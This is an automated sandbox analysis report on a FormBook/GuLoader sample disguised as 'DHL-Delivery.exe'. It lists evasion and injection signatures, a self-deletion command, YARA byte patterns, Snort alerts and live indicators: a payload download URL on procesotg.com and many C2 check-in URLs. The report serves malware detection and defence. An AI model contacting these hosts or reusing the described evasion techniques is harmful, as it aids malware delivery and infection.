Joe Sandbox Cloud Pro Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report DHL-Delivery.exe

Overview

General Information

Sample Name:DHL-Delivery.exe
Analysis ID:121908
MD5:12ba338de35e611aef4461c94713a0ff
SHA1:63257aadcfe91fb0556d60cb6af265851e9991d5
SHA256:f5e9a63f2238667200b4f015774742db6c4cd71cd109877249f53403da2c1da0

Most interesting Screenshot:

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Potential malicious icon found
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64native
  • DHL-Delivery.exe (PID: 5880 cmdline: 'C:\Users\user\Desktop\DHL-Delivery.exe' MD5: 12BA338DE35E611AEF4461C94713A0FF)
    • DHL-Delivery.exe (PID: 892 cmdline: 'C:\Users\user\Desktop\DHL-Delivery.exe' MD5: 12BA338DE35E611AEF4461C94713A0FF)
      • explorer.exe (PID: 4472 cmdline: MD5: C25CF941EE6C7927C0A2AB0CB7FABE0B)
        • cmmon32.exe (PID: 6544 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: DEAA709A71519E24B72574A666A82C2D)
          • cmd.exe (PID: 936 cmdline: /c del 'C:\Users\user\Desktop\DHL-Delivery.exe' MD5: C43699F84A68608E7E57C43B7761BBB8)
            • conhost.exe (PID: 1304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C221707E5CE93515AC87507E19181E2A)
          • explorer.exe (PID: 5372 cmdline: explorer.exe MD5: C25CF941EE6C7927C0A2AB0CB7FABE0B)
        • WerFault.exe (PID: 5676 cmdline: C:\Windows\system32\WerFault.exe -u -p 4472 -s 4464 MD5: 875E5FDA571C26F3F6F53F603150497F)
  • SearchUI.exe (PID: 6804 cmdline: 'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe' -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca MD5: 456EC8ADD234A97E7E4DFACE9DABA5EB)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.3591236445.0000000001250000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.3591236445.0000000001250000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000A.00000002.3591236445.0000000001250000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000010.00000000.2663550255.000000001593F000.00000004.00000001.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
    • 0xedb8:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
    00000010.00000000.2663550255.000000001593F000.00000004.00000001.sdmpLokiBot_Dropper_Packed_R11_Feb18_RID328FSemiautomatic generated rule - file scan copy.pdf.r11Florian Roth
    • 0xedb8:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
    Click to see the 26 entries

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for domain / URLShow sources
    Source: procesotg.comVirustotal: Detection: 6%Perma Link
    Multi AV Scanner detection for submitted fileShow sources
    Source: DHL-Delivery.exeVirustotal: Detection: 34%Perma Link
    Source: DHL-Delivery.exeMetadefender: Detection: 16%Perma Link
    Source: DHL-Delivery.exeReversingLabs: Detection: 41%
    Yara detected FormBookShow sources
    Source: Yara matchFile source: 0000000A.00000002.3591236445.0000000001250000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.2192566963.000000001DE60000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000A.00000002.3584082067.0000000000C90000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.2176973560.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000A.00000002.3592997034.0000000001280000.00000004.00000001.sdmp, type: MEMORY
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeFile opened: C:\Windows\System32\TileDataRepository.dll
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeFile opened: C:\Windows\SYSTEM32\Windows.StateRepository.dll
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeFile opened: C:\Windows\SYSTEM32\StateRepository.Core.dll
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeFile opened: C:\Windows\System32\appresolver.dll
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeFile opened: C:\Windows\System32\Windows.StateRepositoryPS.dll
    Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeFile opened: C:\Windows\SYSTEM32\profext.dll
    Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop ebx10_2_00C97B02

    Networking:

    barindex
    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
    Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.80:49717 -> 34.102.136.180:80
    Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.80:49717 -> 34.102.136.180:80
    Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.0.80:49717 -> 34.102.136.180:80
    Source: global trafficHTTP traffic detected: GET /mph/?7nd8=xN8MOsIT0Rq2X8dTTMBNIZU3pxvmACeI7QBEYfYdwwTaJ/23XAd4ioB5cniAuwH0eCwAK57FEw==&H8R=O2M4x0yh946L1Rd0 HTTP/1.1Host: www.evolutionhvac.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /mph/?7nd8=fYI7bmIO81+roZeW9lrXtyBB7ACs35rvTT3MR+zv8ROQxnWL1QNM5JZe5t9Q0E+dD7OYKywqxQ==&H8R=O2M4x0yh946L1Rd0 HTTP/1.1Host: www.officialilluminati.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
    Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
    Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
    Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
    Source: global trafficHTTP traffic detected: GET /bin_dIyfkt31.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: procesotg.comCache-Control: no-cache
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Windows\explorer.exeCode function: 18_2_052D0782 getaddrinfo,setsockopt,recv,18_2_052D0782
    Source: global trafficHTTP traffic detected: GET /bin_dIyfkt31.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: procesotg.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /mph/?7nd8=xN8MOsIT0Rq2X8dTTMBNIZU3pxvmACeI7QBEYfYdwwTaJ/23XAd4ioB5cniAuwH0eCwAK57FEw==&H8R=O2M4x0yh946L1Rd0 HTTP/1.1Host: www.evolutionhvac.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /mph/?7nd8=fYI7bmIO81+roZeW9lrXtyBB7ACs35rvTT3MR+zv8ROQxnWL1QNM5JZe5t9Q0E+dD7OYKywqxQ==&H8R=O2M4x0yh946L1Rd0 HTTP/1.1Host: www.officialilluminati.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: SearchUI.exe, 00000019.00000003.3115508819.000001EEA3FBF000.00000004.00000001.sdmpString found in binary or memory: www.yahoo.cn.bing. equals www.yahoo.com (Yahoo)
    Source: unknownDNS traffic detected: queries for: procesotg.com
    Source: SearchUI.exe, 00000019.00000003.3048466820.000001E6A1D9F000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
    Source: SearchUI.exe, 00000019.00000003.3048318940.000001E6A1D85000.00000004.00000001.sdmp, SearchUI.exe, 00000019.00000003.2956523660.000001EEA3212000.00000004.00000001.sdmp, Dae9F3uWr1j96ciQZxvUiMLiQ20[1].js.25.dr, HkpLvsXkCMkluzD--i9_Hl9v67o[1].js.25.drString found in binary or memory: http://facebook.github.io/react/docs/error-decoder.html?invariant
    Source: explorer.exe, 00000007.00000000.2130775176.0000000010866000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
    Source: SearchUI.exe, 00000019.00000003.3048466820.000001E6A1D9F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
    Source: SearchUI.exe, 00000019.00000003.3048466820.000001E6A1D9F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
    Source: DHL-Delivery.exe, 00000006.00000002.2178092219.0000000000785000.00000004.00000020.sdmpString found in binary or memory: http://procesotg.com/
    Source: DHL-Delivery.exe, 00000006.00000002.2177871949.0000000000758000.00000004.00000020.sdmpString found in binary or memory: http://procesotg.com/bin_dIyfkt31.bin
    Source: DHL-Delivery.exe, 00000006.00000002.2177968069.000000000076C000.00000004.00000020.sdmpString found in binary or memory: http://procesotg.com/bin_dIyfkt31.binHxy5
    Source: DHL-Delivery.exe, 00000006.00000002.2177968069.000000000076C000.00000004.00000020.sdmpString found in binary or memory: http://procesotg.com/bin_dIyfkt31.binJ
    Source: explorer.exe, 00000007.00000000.2083650895.0000000001340000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.849nmaym.info
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.849nmaym.info/mph/
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.849nmaym.info/mph/www.biostaticwall.com
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.849nmaym.infoReferer:
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmp, explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.amonez.com
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmp, explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.amonez.com/mph/
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.amonez.com/mph/www.evolutionhvac.net
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.amonez.com/mph/www.jobjori.com
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmp, explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.amonez.comReferer:
    Source: explorer.exe, 00000007.00000000.2130775176.0000000010866000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmp, explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.barriobruja.com
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmp, explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.barriobruja.com/mph/
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.barriobruja.com/mph/www.inlandtransporters.com
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.barriobruja.com/mph/www.ytvksh.space
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmp, explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.barriobruja.comReferer:
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.bikeemperor.com
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.bikeemperor.com/mph/
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.bikeemperor.com/mph/www.growgirlgrow.net
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.bikeemperor.comReferer:
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.biostaticwall.com
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.biostaticwall.com/mph/
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.biostaticwall.com/mph/www.growmeanairway.com
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.biostaticwall.comReferer:
    Source: explorer.exe, 00000007.00000000.2130775176.0000000010866000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.evolutionhvac.net
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.evolutionhvac.net/mph/
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.evolutionhvac.net/mph/www.officialilluminati.net
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.evolutionhvac.netReferer:
    Source: explorer.exe, 00000007.00000000.2130775176.0000000010866000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
    Source: explorer.exe, 00000007.00000000.2130775176.0000000010866000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
    Source: explorer.exe, 00000007.00000000.2130775176.0000000010866000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
    Source: explorer.exe, 00000007.00000000.2130775176.0000000010866000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
    Source: explorer.exe, 00000007.00000000.2130775176.0000000010866000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.gorgereport.com
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.gorgereport.com/mph/
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.gorgereport.com/mph/www.musicoccaz.com
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.gorgereport.comReferer:
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmp, explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.groupoperationltd.com
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmp, explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.groupoperationltd.com/mph/
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.groupoperationltd.com/mph/www.gorgereport.com
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.groupoperationltd.com/mph/www.liquidflooringinternational.com
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmp, explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.groupoperationltd.comReferer:
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmp, explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.growgirlgrow.net
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.growgirlgrow.net/mph/
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.growgirlgrow.net/mph/www.mcfarlandfamilyevents.com
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmp, explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.growgirlgrow.netReferer:
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.growmeanairway.com
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.growmeanairway.com/mph/
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.growmeanairway.com/mph/www.barriobruja.com
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.growmeanairway.comReferer:
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.inlandtransporters.com
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.inlandtransporters.com/mph/
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.inlandtransporters.com/mph/uE
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.inlandtransporters.comReferer:
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.irisgiladiphotography.com
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.irisgiladiphotography.com/mph/
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.irisgiladiphotography.com/mph/www.ldgstudio.com
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.irisgiladiphotography.comReferer:
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.jaimeirazabal.com
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.jaimeirazabal.com/mph/
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.jaimeirazabal.com/mph/www.growgirlgrow.net
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.jaimeirazabal.comReferer:
    Source: explorer.exe, 00000007.00000000.2130775176.0000000010866000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.jobjori.com
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.jobjori.com/mph/
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.jobjori.com/mph/www.olenfex.com
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.jobjori.comReferer:
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.koottukudumbam.com
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.koottukudumbam.com/mph/
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.koottukudumbam.com/mph/www.simplymadphotography.com
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.koottukudumbam.comReferer:
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.ldgstudio.com
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.ldgstudio.com/mph/
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.ldgstudio.com/mph/www.barriobruja.com
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.ldgstudio.comReferer:
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.liquidflooringinternational.com
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.liquidflooringinternational.com/mph/
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.liquidflooringinternational.com/mph/www.849nmaym.info
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.liquidflooringinternational.comReferer:
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.maxmaldives.com
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.maxmaldives.com/mph/
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.maxmaldives.com/mph/www.olenfex.com
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.maxmaldives.comReferer:
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.mcchoo.xyz
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.mcchoo.xyz/mph/
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.mcchoo.xyz/mph/www.jaimeirazabal.com
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.mcchoo.xyzReferer:
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.mcfarlandfamilyevents.com
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.mcfarlandfamilyevents.com/mph/
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.mcfarlandfamilyevents.com/mph/www.groupoperationltd.com
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.mcfarlandfamilyevents.comReferer:
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.musicoccaz.com
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.musicoccaz.com/mph/
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.musicoccaz.com/mph/www.amonez.com
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmpString found in binary or memory: http://www.musicoccaz.comReferer:
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.officialilluminati.net
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.officialilluminati.net/mph/
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.officialilluminati.net/mph/www.yuneimit.com
    Source: explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.officialilluminati.netReferer:
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmp, explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.olenfex.com
    Source: explorer.exe, 00000007.00000002.2740277466.0000000008097000.00000004.00000001.sdmp, explorer.exe, 00000012.00000002.3658520643.00000000057A0000.00000004.00000001.sdmpString found in binary or memory: http://www.olenfex.com/mph/
